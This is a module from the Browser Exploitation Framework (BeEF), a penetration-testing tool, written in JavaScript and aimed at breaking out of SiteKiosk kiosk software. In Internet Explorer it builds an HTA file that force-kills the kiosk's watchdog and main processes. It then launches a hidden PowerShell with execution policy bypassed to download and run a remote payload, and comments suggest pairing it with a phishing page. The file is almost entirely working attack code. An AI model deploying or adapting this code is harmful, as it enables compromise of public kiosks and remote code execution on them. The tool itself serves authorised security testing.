Path: blob/master/modules/social_engineering/sitekiosk_breakout/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78if(beef.browser.isIE()){9// application='yes' is IE-only and needed to load the HTA into an IFrame.10// in this way you can have your phishing page, and load the HTA on top of it11// beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});12bb = new MSBlobBuilder();13bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM Watchdog.exe\');<\/script>');14bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM SiteKiosk.exe\');<\/script>');15bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring(\\\\\\"<%= @payload_handler %>\\\\\\"))"\');<\/script>');16window.navigator.msSaveOrOpenBlob(bb.getBlob(),"BREAKOUT.hta");17beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');18}19});202122